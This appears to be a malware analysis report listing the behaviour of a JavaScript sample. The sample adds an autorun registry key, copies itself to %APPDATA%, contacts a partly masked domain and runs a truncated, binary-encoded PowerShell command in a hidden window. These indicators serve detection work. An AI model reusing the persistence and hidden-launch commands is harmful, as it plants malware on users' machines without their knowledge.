Technical Information
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'lol' = '%APPDATA%\<File name>.js'
- %APPDATA%\<File name>.js
- 'kh###osja.net':80
- DNS ASK google.com
- DNS ASK kh###osja.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $gf=(00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "%APPDATA%\<File name>.js"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c copy "<PATH_SAMPLE>.js" "%APPDATA%\" /Y' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $gf=(00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010...
- '<SYSTEM32>\cmd.exe' /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "%APPDATA%\<File name>.js"
- '<SYSTEM32>\cmd.exe' /c copy "<PATH_SAMPLE>.js" "%APPDATA%\" /Y
- '<SYSTEM32>\reg.exe' ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "%APPDATA%\<File name>.js"